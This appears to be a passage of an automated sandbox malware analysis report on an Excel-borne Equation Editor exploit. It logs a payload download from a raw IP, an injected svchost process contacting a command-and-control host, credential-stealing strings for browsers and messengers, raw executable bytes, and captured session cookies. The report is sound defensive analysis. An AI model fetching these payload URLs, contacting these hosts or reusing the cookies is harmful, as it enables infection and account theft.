          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_10006580 FindFirstFileExA,17_2_10006580
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350055E WriteFile,2_2_0350055E
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350045F CreateFileW,2_2_0350045F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035004F6 WriteFile,2_2_035004F6
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035005E9 WriteFile,WinExec,ExitProcess,2_2_035005E9
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500496 LoadLibraryW,2_2_03500496
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350069C WinExec,ExitProcess,2_2_0350069C
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035003D0 CreateFileW,2_2_035003D0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500254 CreateFileW,2_2_03500254
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035002DF CreateFileW,2_2_035002DF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500542 WriteFile,2_2_03500542
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500244 CreateFileW,2_2_03500244
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500249 CreateFileW,2_2_03500249
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350024B CreateFileW,2_2_0350024B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035002CB CreateFileW,2_2_035002CB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350044C CreateFileW,2_2_0350044C
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350034C CreateFileW,2_2_0350034C
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035002CE CreateFileW,2_2_035002CE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035005CF WriteFile,2_2_035005CF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035002F5 CreateFileW,2_2_035002F5
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500279 CreateFileW,2_2_03500279
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035002EB CreateFileW,2_2_035002EB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035003EC CreateFileW,2_2_035003EC
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350026D CreateFileW,2_2_0350026D
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500391 CreateFileW,2_2_03500391
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500292 CreateFileW,2_2_03500292
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500413 CreateFileW,2_2_03500413
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350031A CreateFileW,2_2_0350031A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350031F CreateFileW,2_2_0350031F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500289 CreateFileW,2_2_03500289
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350058F WriteFile,2_2_0350058F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350028F CreateFileW,2_2_0350028F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035003B7 ExitProcess,CreateFileW,2_2_035003B7
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035006BC ExitProcess,2_2_035006BC
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0350033F CreateFileW,2_2_0350033F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03500224 CreateFileW,2_2_03500224
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035002A4 CreateFileW,2_2_035002A4
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035005AB WriteFile,2_2_035005AB

          Networking

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.94.53.100 2766Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDomain query: geoplugin.net
          Source: C:\Windows\SysWOW64\svchost.exeDomain query: yuahdgbceja.sytes.net
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.237.33.50 80Jump to behavior
          Source: Malware configuration extractorURLs: yuahdgbceja.sytes.net
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 23.94.53.100:2766
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 02 May 2024 08:28:48 GMTAccept-Ranges: bytesETag: W/"4ca767c16a9cda1:0"Server: Microsoft-IIS/8.5Date: Thu, 02 May 2024 02:54:52 GMTContent-Length: 1402368Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e5 c1 32 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 b6 0b 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 15 00 00 04 00 00 a5 0f 16 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 b0 fb 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 fb 07 00 00 40 0d 00 00 fc 07 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 40 15 00 00 76 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /GVV.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0028CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,3_2_0028CE44
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].jsonJump to behavior
          Source: global trafficHTTP traffic detected: GET /chrome/whats-new/m109?internal=true HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMmBzLEGIjB5NrDOyf958iCbJpAJxeAyyHGDgUuUJYBV60K9olc20v99BBChXQUVByr6JLh_QvcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=nQDSKKCUY72nbduCHcRHhXACOPv96Kxy9BGRkfztkyu42Rwrd_gHXoam_RmDAYCnj8eZlKgLn5fWew08N8kSyFNPm8WqA8IlPx75gPq5HjHDBfOIlzDJCalLIF09aVWJgIdxbVFWcdPC2s7k68aYWtAFmlXnyKvJy0ZNSikFz3w
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMqBzLEGIjAmi-UIIFqSTjkw-RfWXi2GfkOK6xdeNQDHNk-OB5e4eww8XVW3FAYyUUV3pTR2uxYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=nQDSKKCUY72nbduCHcRHhXACOPv96Kxy9BGRkfztkyu42Rwrd_gHXoam_RmDAYCnj8eZlKgLn5fWew08N8kSyFNPm8WqA8IlPx75gPq5HjHDBfOIlzDJCalLIF09aVWJgIdxbVFWcdPC2s7k68aYWtAFmlXnyKvJy0ZNSikFz3w
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMuBzLEGIjDHkOYETEkfpPO5BNVM4qFB3EzErW1N_BxHwWaZNSSd6fpa03DeWClTlQmn-8-Tj7IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=fgAQ-FMftBn8U6qLB_xWWkkkc9DVEvN_N6o2tEue_K4GUZExVgaPgdzwdYTojqKVxXyKNrqWVPheSLnkhhM1Yn5U2V873JQdGiigIZ_Y-T9zYj0D29_T15mASCX6KaFQVRLJg0wObsmDE1eXTDGt31FHclpLdrGt-svEoASRDdY
          Source: global trafficHTTP traffic detected: GET /GVV.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: bhvA8BE.tmp.20.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
          Source: svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
          Source: svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: svchost.exe, 00000014.00000003.778758157.000000000016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.facebook.com (Facebook)
          Source: svchost.exe, 00000014.00000003.778758157.000000000016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.yahoo.com (Yahoo)
          Source: bhvA8BE.tmp.20.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: yuahdgbceja.sytes.net
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCross-Origin-Resource-Policy: cross-originContent-Type: text/html; charset=UTF-8X-Content-Type-Options: nosniffAccept-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-MotionCritical-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-MotionVary: Accept-Encoding, Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-MotionDate: Thu, 02 May 2024 02:56:04 GMTServer: sffeContent-Length: 187622X-XSS-Protection: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
          Source: EQNEDT32.EXE, 00000002.00000002.535775518.000000000061D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.535775518.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.54.101/GVV.exe
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
          Source: bhvA8BE.tmp.20.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
          Source: svchost.exe, svchost.exe, 00000011.00000002.783667001.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
          Source: Bactris.exe, 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
